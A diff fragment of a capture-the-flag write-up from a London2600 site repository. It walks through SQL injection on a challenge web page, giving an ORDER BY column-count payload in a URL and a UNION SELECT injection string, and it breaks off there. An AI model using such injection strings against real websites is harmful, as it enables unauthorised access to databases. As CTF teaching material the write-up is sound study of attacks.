London2600/Pico/content/articles/20150827_some_random_ctf.md

 [https://ctf-ddn.rhcloud.com/challenges/web/01/lines.php?catId=Classic%20Cars%27%20ORDER%20BY%209;%23&showquery=1](https://ctf-ddn.rhcloud.com/challenges/web/01/lines.php?catId=Classic%20Cars%27%20ORDER%20BY%209;%23&showquery=1)

 ORDER BY 10 is the first one to error, so it looks like we have 9 columns.
 Also, using -- to comment out the rest of the query doesn't work with ORDER BY.
 We need to use # instead.
 I have no idea why.
-Anyway, now we have our number of columns in the result, we can start playing.
+Anyway, now we have our number of columns in the result we can start playing.
 I'll switch to just showing the contents of the 'catId' key now, since the rest of the URL is not relevant.

 ~~~~~~
 Classic Cars' union select '1', '2', '3', '4', '5', '6', '7', '8', '9';%23